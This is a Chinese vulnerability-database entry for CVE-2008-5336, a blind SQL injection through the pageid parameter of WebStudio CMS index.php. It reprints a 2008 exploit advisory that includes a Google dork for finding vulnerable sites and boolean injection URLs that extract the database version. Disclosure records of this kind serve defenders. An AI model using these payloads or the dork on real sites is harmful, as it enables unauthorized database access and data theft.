WebStudio CMS index.php SQL注入漏洞

漏洞ID	1116812	漏洞类型	SQL注入
发布时间	2008-11-24	更新时间	2008-12-04
CVE编号	CVE-2008-5336	CNNVD-ID	CNNVD-200812-060
漏洞平台	PHP	CVSS评分	7.5

|漏洞来源

https://www.exploit-db.com/exploits/7216
https://www.securityfocus.com/bid/80784
https://cxsecurity.com/issue/WLB-2008120013
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-060

|漏洞详情

WebStudioCMS是一个强大的，模块化的网站内容管理系统。WebStudioCMS的index.php中存在SQL注入漏洞。远程攻击者可以借助pageid参数，执行任意SQL指令。

|漏洞EXP

Application:  WebStudio CMS

 

Vendor Name: BDigital Media Ltd

 

Vendors Url:  http://www.bdigital.biz

 

Bug Type:     WebStudio CMS (pageid) Blind SQL Injection Vulnerability

 

Exploitation: Remote

 

Severity: Critical

 

Solution Status: Unpatched 

 

Introduction: WebStudio CMS is a modular Web Content Management System
solution.

 

Google Dork:  "Powered by WebStudio"

 

 

Description:

 

WebStudio CMS is prone to an SQL-injection vulnerability because it fails to
sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application,
access or modify data, or exploit latent vulnerabilities in the underlying
database.

 

PoC:

 

http://localhost/index.php?pageid=1+and+1=1 ( TRUE  )

 

http://localhost/index.php?pageid=1+and+1=2 ( FALSE )

 

Exploit:

 

http://localhost/index.php?pageid=1+and+substring(@@version,1,1)=3 ( TRUE  )

 

http://localhost/index.php?pageid=1+and+substring(@@version,1,1)=4 ( FALSE )

 

http://localhost/index.php?pageid=1+and+substring(@@version,1,1)=5 ( FALSE )

 

Solution:

 

There was no vendor-supplied solution at the time of entry.

 

Edit source code manually to ensure user-supplied input is correctly
sanitised.

 

 

Credits:

 

Charalambous Glafkos

Email:  glafkos (at) astalavista (dot) com

___________________________________________

ASTALAVISTA - the hacking & security community

www.astalavista.com

www.astalavista.net

# milw0rm.com [2008-11-24]

|受影响的产品

BDigital Web Solutions WebStudio CMS Nil

|参考资料

来源:XF
名称:webstudiocms-index-sql-injection(46818)
链接:http://xforce.iss.net/xforce/xfdb/46818
来源:BID
名称:32449
链接:http://www.securityfocus.com/bid/32449
来源:BUGTRAQ
名称:20081124WebStudioCMS'pageid'BlindSQLInjection
链接:http://www.securityfocus.com/archive/1/archive/1/498597/100/0/threaded
来源:MILW0RM
名称:7236
链接:http://www.milw0rm.com/exploits/7236
来源:MILW0RM
名称:7216
链接:http://www.milw0rm.com/exploits/7216
来源:VUPEN
名称:ADV-2008-3273
链接:http://www.frsirt.com/english/advisories/2008/3273
来源:SREASON
名称:4690
链接:http://securityreason.com/securityalert/4690